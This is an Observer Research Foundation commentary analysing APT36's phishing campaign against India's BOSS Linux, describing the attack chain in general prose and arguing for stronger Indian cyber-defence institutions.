-
CENTRES
Progammes & Centres
Location
APT36’s targeting of India’s BOSS Linux system reveals the expanding scope of Pakistan’s cyber-espionage operations, underscoring the urgent need for India to strengthen its digital defence architecture.
Following Operation Sindoor, the Pakistan-linked threat group APT36, also known as Transparent Tribe, has targeted India’s Bharat Operating System Solutions (BOSS) Linux[1] operating system numerous times. This marks a significant departure from the group’s usual playbook, which has been centred on Windows-centric malware and spear-phishing lures. By expanding its reach to compromise BOSS Linux, a system widely adopted by Indian government entities, APT36 is signalling not merely a technical upgrade but a deliberate escalation on the cyber-espionage front in the India-Pakistan rivalry.
APT36’s targeting of BOSS Linux indicates a calculated attempt to undermine confidence in this indigenous platform. A successful breach not only grants access to sensitive communications and classified data but also erodes institutional faith in self-reliant technological ecosystems. This outcome serves Pakistan’s interests on multiple levels: tactically, by harvesting intelligence; and strategically, by discrediting India’s efforts at digital autonomy.
By expanding its reach to compromise BOSS Linux, a system widely adopted by Indian government entities, APT36 is signalling not merely a technical upgrade but a deliberate escalation on the cyber-espionage front in the India-Pakistan rivalry.
The discovery of this campaign underscores an uncomfortable reality: Pakistan-based cyber actors, often operating under the aegis of state agencies or enjoying tacit state protection, are evolving their capabilities beyond low-level phishing attacks into strategically targeted, cross-platform espionage operations. This trend holds profound implications for India’s national security, not least because it compromises trust in indigenous technologies developed as alternatives to foreign software ecosystems.
The latest intrusion by APT36 begins with a familiar vector, spear-phishing emails. Camouflaged as official government correspondence, these emails deliver compressed archives containing malicious desktop files. Unlike traditional Windows executables, these shortcuts are designed explicitly for Linux environments and crafted to resemble innocuous PDF files.
When executed, the desktop file triggers a series of covert commands embedded in its Exec field. Utilities such as ‘curl’ and ‘xxd’ are then employed to fetch a hex-encoded payload from attacker-controlled infrastructure, decode it, and silently deploy it under the temporary directory. With execution rights granted, the payload operates silently in the background, all while the user is distracted by a decoy PDF opened in parallel.
Forensic evidence suggests a Pakistan state-backed effort, given the substantial resources expended on developing BOSS Linux-specific attack chains and maintaining redundant infrastructure. The campaign is more than an opportunistic strike; it is an assault on India’s technological sovereignty.
Persistence is achieved by ensuring that the malware relaunches upon every login. Its communications are funnelled to command-and-control (C2) nodes and the newly registered domain, both of which reflect a carefully coordinated campaign.
Forensic evidence suggests a Pakistan state-backed effort, given the substantial resources expended on developing BOSS Linux-specific attack chains and maintaining redundant infrastructure. The campaign is more than an opportunistic strike; it is an assault on India’s technological sovereignty.
Pakistan-supported hacking groups collectively serve Islamabad’s strategic agenda. APT 36, also known as Transparent Tribe, is primarily focused on cyber espionage against the Indian government, targeting Indian defence personnel, diplomatic missions, and critical infrastructure. Its preferred tactics have included malware-laden documents, watering-hole attacks, and social engineering through fake recruitment portals. There have been reports of a link between other APT-based groups, such as SideCopy, SideWinder, and TransparentTribe. These groups often share infrastructure, malware families, or operational overlaps, suggesting either coordination or common direction by Pakistan’s intelligence services, particularly the Inter-Services Intelligence (ISI).
While India remains the principal target, Pakistan-based hackers have extended their reach internationally, either independently or in collaboration with other state-linked actors. Several examples illustrate this global dimension. For instance, in 2021, soon after the Taliban takeover of Afghanistan, Pakistan-linked hackers engaged in a campaign against Afghan government and civil society networks, consolidating Islamabad’s influence and monitoring rival factions. Similarly, there have been reported overlaps between Pakistani hacker groups and campaigns affecting Gulf states, particularly those hosting large Indian diasporas. Espionage here has dual value: monitoring Indian activities abroad and gaining leverage with Gulf governments. Security firms have observed occasional alignment between Pakistani actors and broader anti-Western cyber campaigns, some with tacit Chinese or Iranian involvement. These collaborations may be opportunistic rather than formal. Still, they indicate a willingness on the part of Pakistani hackers to position themselves as part of the global anti-Western cyber-espionage ecosystem.
As India promotes platforms like BOSS Linux, there should be a mandatory and more rigorous security certification framework led by CERT-In, DRDO, and the National Informatics Centre (NIC).
In essence, Pakistan has fostered an environment where state priorities, cybercrime networks, and ideological motivations blur into a hybrid threat matrix. The state benefits from plausible deniability while reaping the intelligence dividends of global cyber operations.
Over the past decade, Pakistan-based hackers have evolved from low-level disruptors into sophisticated cyber-espionage actors. Between 2010 and 2014, their operations primarily involved website defacements, online propaganda, and basic phishing attacks aimed at embarrassing Indian institutions. From 2015 to 2019, groups like APT36 matured technically, shifting toward credential theft, malware infiltration, and sustained surveillance of India’s defence and diplomatic networks. The period 2020 to 2024 marked a cross-platform expansion, with Pakistan-linked actors developing Android malware targeting Indian military personnel through fake applications and deploying advanced Windows-based trojans with layered obfuscation. By 2025, the focus had moved to Linux-specific targeting, particularly against India’s indigenous BOSS Linux system. This development signals dedicated research capacity and a state-backed commitment to penetrating critical digital infrastructure. Such a trajectory reflects Pakistan’s transition from a nuisance-level cyber actor to a structured, strategic, and offensive one that directly threatens India’s technological and national security landscape.
The attack on India’s BOSS Linux should not be viewed as an isolated cyber incident but as part of a broader transnational security challenge unfolding in the grey zone of hybrid warfare. Pakistan’s strategy has long employed a blend of conventional, sub-conventional, and informational tools to weaken India’s security architecture, and cyber operations now represent its newest frontier.
Given that India has one of the most advanced IT ecosystems and that private Indian cybersecurity companies have been able to track cyberattacks — particularly those targeting defence technology, finance, and telecommunications — more swiftly, there is a need for greater synergy between private and government agencies.
By targeting BOSS Linux, an indigenous operating system central to India’s drive for technological self-reliance, Pakistan-linked actors are staging an attack on India’s digital sovereignty. Beyond espionage, such operations enable adversaries to penetrate government systems on a large scale, intercepting sensitive policy, defence, and diplomatic communications that could influence decision-making during crises.
In times of tension or limited conflict, pre-positioned malware could be activated to paralyse communication channels, interfere with logistics, or disrupt essential services, achieving strategic disruption without crossing the threshold of open war. In this sense, the targeting of BOSS Linux is symbolic of how the digital domain has become an extension of the battlefield, where state and proxy actors engage India in an unceasing contest for advantage in the grey zone.
India must adopt a multi-layered, adaptive defence posture to counter the evolving threat landscape.
The exploitation of BOSS Linux by APT36 is not merely a technical episode, but a strategic signal: Pakistan’s cyber-espionage machinery is adapting to India’s countermeasures and targeting indigenous solutions once thought secure. Transparent Tribe’s evolution from Windows payloads to Linux-specific malware reveals an expanding toolkit designed to penetrate India’s technological backbone.
The government and military must upgrade the Defence Cyber Agency to a Command-level body and formulate a holistic mechanism for securing national cyberspace.
Pakistan’s broader cyber ecosystem, supported by state patronage and interwoven with global hacker networks, poses a persistent threat to India’s national security. For New Delhi, the challenge is not only to neutralise these campaigns but also to reinforce trust in indigenous systems and project resilience.
Cyber warfare, unlike conventional conflict, unfolds silently yet relentlessly. In this theatre, the battle is as much about perceptions of security as it is about technical breaches. India’s defensive strategy must therefore be holistic, encompassing technological, institutional, and diplomatic aspects, to ensure that its sovereignty in cyberspace remains uncompromised.
Soumya Awasthi is a Fellow with the Centre for Security, Strategy and Technology at the Observer Research Foundation.
[1] BOSS Linux is a free, Indian operating system based on Linux, created by the government to promote open-source software and offer a secure system tailored for India's needs. It supports Indian languages and is used in government and the defense sector for its stability and security features, offering variants for desktop, server, and secure enterprise use.
The views expressed above belong to the author(s). ORF research and analyses now available on Telegram! Click here to access our curated content — blogs, longforms and interviews.
Dr Soumya Awasthi is Fellow, Centre for Security, Strategy and Technology at the Observer Research Foundation. Her work focuses on the intersection of technology and national ...
Read More +
PREV
